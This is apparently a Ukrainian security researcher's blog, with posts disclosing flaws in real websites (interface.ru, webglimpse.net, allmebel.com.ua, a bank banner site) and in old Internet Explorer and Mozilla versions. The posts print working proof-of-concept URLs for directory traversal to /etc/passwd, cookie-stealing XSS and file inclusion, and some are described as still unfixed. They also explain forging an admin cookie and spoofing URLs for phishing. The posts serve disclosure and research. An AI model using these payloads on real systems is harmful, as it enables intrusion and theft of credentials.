Websecurity - Веб безпека

11.12.2008

У лютому, 15.02.2008, я знайшов Local File Inclusion, Denial of Service та Directory Traversal уразливості на проекті http://www.interface.ru. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливість на www.interface.ru.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

29.04.2009

Local File Inclusion:

http://www.interface.ru/fset.asp?Url=fset.asp

DoS (Recursive File Include):

http://www.interface.ru/fset.asp?Url=fset.asp?Url=fset.asp

http://www.interface.ru/fset.asp?Url=fset.asp … ?Url=fset.asp

Для проведення DoS атаки через рекурсивне включення файлів, потрібно безпосередньо в запиті (в URL) вказати необхідний рівень рекурсії. Тому що в ASP рекурсивне включення не виконується автоматично.

Directory Traversal:

http://www.interface.ru/fset.asp?Url=../robots.txt

Дані уразливості досі не виправлені.

Нещодавно, 22.04.2009, я виявив нові Denial of Service уразливості в Internet Explorer. Про що найближчим часом повідомлю розробникам браузера. Дані уразливості подібні до DoS уразливості в Internet Explorer.

Нещодавно були виявлені нові DoS уразливості в Windows Media Player (WMP 11). В мене дані уразливості працють в WMP 10. Як я перевірив, браузер IE також може бути атакованим, при включенні даних спеціальних wav файлів (що підвисають WMP) у веб сторінку. Причому атака спрацьовує тільки в IE, але не в інших браузерах. Це Cross-Application DoS уразливість.

DoS:

IE DoS Exploit8.html

IE DoS Exploit9.html

При запуску експлоітів браузер зависає.

Уразлива версія Internet Explorer 6 (6.0.2900.2180) та попередні версії. І потенційно IE7 та IE8. При наявності в системі WMP 11 або попередніх версій.

В даній добірці уразливості в веб додатках:

• Updated tk packages fix buffer overflow vulnerability (деталі)
• DoS vulnerability in lighttpd (деталі)
• Pligg 9.9.0 editlink.php SQL Injection Vulnerability (деталі)
• PECL APC: Buffer Overflow (деталі)
• paFileDB 3.1 Remote SQL Injection (деталі)
• Pu Arcade component for Joomla - SQL injection (деталі)
• SAP Netweaver 6.40-7.0 Cross-Site-Scripting (деталі)
• Microsoft Windows SharePoint Services Picture Source XSS (деталі)
• XSS issue in BOXiR2 (деталі)
• WiKID wClient-PHP <= 3.0-2 Multiple XSS Vulnerabilities (деталі)

18.11.2008

Сьогодні, після попередніх уразливостей Webglimpse, я знайшов Full path disclosure, Cross-Site Scripting, Directory Traversal та Authorization bypass уразливості в Webglimpse. Це локальна пошукова система. Дірки виявив на офіційному сайті системи http://webglimpse.net.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

27.04.2009

Уразливості в адмінці Webglimpse (в яку можна потрапити через гостьовий акаунт, або захопивши кукіс адміна).

Full path disclosure:

http://site/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=1

XSS:

http://site/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Directory Traversal:

http://site/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd

Authorization bypass:

Через слабкий алгоритм генерації кукіса, можна створити кукіс з даних з файла .wgpasswd (який можна отримати через Directory Traversal уразливість). З цим кукісом можна увійти в адмінку з правами адміністратора (напряму з даними з файла .wgpasswd зайти в адмінку не вийде, тільки через кукіс).

Експлоіт:

Webglimpse.txt

Кукісу з іменем LOGIN потрібно присвоїти згенероване значення, як це показано в експлоіті.

Уразливі Webglimpse 2.18.7 та попередні версії.

Нещодавно, 22.04.2009, я виявив нову Denial of Service уразливість в Internet Explorer. Про що найближчим часом повідомлю розробникам браузера. Дана уразливість подібна до DoS уразливості в Internet Explorer.

Нещодавно була виявлена нова DoS уразливість в Windows Media Player (WMP 11). В мене дана уразливість працює в WMP 10. Як я перевірив, браузер IE також може бути атакованим, при включенні даного спеціального mid файла (що вибивають WMP) у веб сторінку. Причому атака спрацьовує тільки в IE, але не в інших браузерах. Це Cross-Application DoS уразливість.

DoS:

IE DoS Exploit7.html

При запуску експлоіта браузер зависає.

Уразлива версія Internet Explorer 6 (6.0.2900.2180) та попередні версії. І потенційно IE7 та IE8. При наявності в системі WMP 11 або попередніх версій.

В даній добірці уразливості в веб додатках:

• Vulnerabilities in kses-based HTML filters (деталі)
• IBM Informix Dynamic Server DBPATH Buffer Overflow Vulnerability (деталі)
• IBM Informix Dynamic Server Authentication Password Stack Overflow Vulnerability (деталі)
• Alkacon OpenCms sessions.jsp searchfilter XSS (деталі)
• Blogator-script 0.95 Change User Password Vulnerbility (деталі)
• KwsPHP Module ConcoursPhoto XSS (деталі)
• phpTournois <= G4 Remote File Upload/Code Execution Exploit (деталі)
• WoltLab(R) Community Framework XSS and Full Path Disclosure Vulnerability (деталі)
• Swiki 1.5 Multiple Cross-Site Scripting Vulnerabilities (деталі)
• Wikepage Opus 13 2007.2 Directory Traversal Vulnerbility (деталі)

У лютому, 02.02.2008, я знайшов Cross-Site Scripting уразливість на http://aval.rotabanner.com - сайті банерної системи Райффайзен Банк Аваль. Де використовується RotaBanner Local, про уразливості в якій я вже писав. Про що найближчим часом сповіщу адміністрацію сайта.

Стосовно уразливостей на сайтах банків останній раз я писав про нові уразливості на www.privatbank.ua.

XSS:

• alert(document.cookie)
• цікавий
• html включення

06.12.2008

У лютому, 02.02.2008, я знайшов Full path disclosure, Insufficient Anti-automation, Content Spoofing та Information Leakage уразливості на проекті http://allmebel.com.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

24.04.2009

На сторінках з товарами в каталозі сайта використовувалася вразлива капча.

Full path disclosure:

http://allmebel.com.ua/WEB-INF/lib/Image/image.php?src=/home/allmebel/public_html/images/num.jpg&num=08564

Insufficient Anti-automation:

http://allmebel.com.ua/WEB-INF/lib/Image/image.php?src=/home/allmebel/public_html/images/num.jpg&num=08564

Дана капча вразлива до Code guessing bypass method, що я описав в проекті Місяць багів в Капчах. Значення параметра num і є текстом капчі.

Content Spoofing:

http://allmebel.com.ua/WEB-INF/lib/Image/image.php?src=/home/allmebel/public_html/images/num.jpg&num=Site%20was%20hacked!

Information Leakage:

http://allmebel.com.ua/WEB-INF/lib/Image/image.php?src=/etc/passwd

Можлива перевірка наявності файлів на сайті в Internet Explorer або через качалку.

Дані уразливості вже виправлені.

В минулому році я виявив URL Spoofing уразливість в GoogleBot, Mozilla та Internet Explorer. Якщо про уразливості в браузерах я пишу часто і сам знаходжу їх регулярно, як DoS уразливості в Firefox та Opera та Нова DoS уразливість в Internet Explorer, то уразливість в боті пошукової системи, в даному випадку GoogleBot, я знайшов уперше. Боти інших пошукових систем також можуть бути вразливі.

Звичайно боти (павуки) Google та інших пошуковців можуть заіндексувати важливу інформацію, яка потім буде знайдена через Гугл Хакінг. Але це природня особливість ботів пошуковців, а в даному випадку має місце URL Spoofing уразливість.

Дану уразливість я виявив ще в листопаді 2008 року (як почав користуватися сайтом tab.net.ua). За допомогою даної уразливості можна підроблювати URL та проводити фішинг атаки, і використовувати її для поширення шкідливого коду.

URL Spoofing:

http://www.site.com%20www.site2.com

При використанні символу пробіл, можна підробити адресу сайта в адресному рядку. Треба спочатку задати підробну адресу http://www.site.com, потім поставити %20 (один або більше), а потім www.site2.com. В результаті браузер покаже в адресному рядку сконструйовану адресу, але при цьому перейде на сайт http://www.site2.com.

http://www.siiiiiiiiiiiiiiiiiiiite.com%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20www.site2.com

Символів пробіл (в url-encoded формі - %20) повинно бути не більше 19, бо інакше Mozilla видасть повідомлення про помилку. При цьому в IE з даним символом немає жодних проблем і можна використовувати більшу кількість пробілів. В Мозілі ж для приховання справжньої адреси (щоб вона в адресний рядок не помістилася) можна використати додаткові символи в адресі першого сайта, що також можна зробити і в IE.

Уразливість GoogleBot полягає в тому, що він підтримує та індексує подібні адреси, а уразливість Mozilla та IE, що вони дозволяють зайти на подібні адреси. До даної атаки вразливі GoogleBot, Mozilla 1.7.x та IE6. Нові браузери, такі як Firefox 3, Opera 9 та Chrome невразливі.

Реальний приклад даної атаки (проіндексований Гуглом).

URL Spoofing:

http://www.infostore.org%20www.tab.net.ua/sites/files/site_name.FILMI_V_DVDRip/id.67045/

До речі, даний метод може використовуватися для SEO, щоб додати нові ключові слова в URL, при цьому не перевантажуючи реальну адресу веб сайта.

Уразливий GoogleBot.

Уразливі Mozilla 1.7.x та попередні версії.

Уразлива версія Internet Explorer 6 (6.0.2900.2180) та попередні версії. І потенційно IE7 та IE8.

P.S.

Як я перевірив Yahoo! Slurp (бот Yahoo) також уразливий.

В даній добірці уразливості в веб додатках:

• Trend Micro ServerProtect StRpcSrv.dll Insecure Method Exposure Vulnerability (деталі)
• Gazi Okul Sitesi 2007(tr)(fotokategori.asp) Remote SQL Injection (деталі)
• ACLS ineffective in SQL-Ledger and LedgerSMB (деталі)
• LedgerSMB 1.2.0 finally released, fixes CVE-2006-5589 (деталі)
• America Online AOL Instant Messenger AIM6.0 or 6.5 or higher XSS remote execution (деталі)
• Remote Command execution, HTML and JavaScript injection vulnerabilities in AOL’s Instant Messaging software (деталі)
• Datalife Engine 6.7 XSRF (деталі)
• Writers Block SQL Injection Vulnerabilities (деталі)
• Parallels virtuozzo’s VZPP multiple csrf vulnerabilities (деталі)
• Joomla Component com_lms SQL Injection (деталі)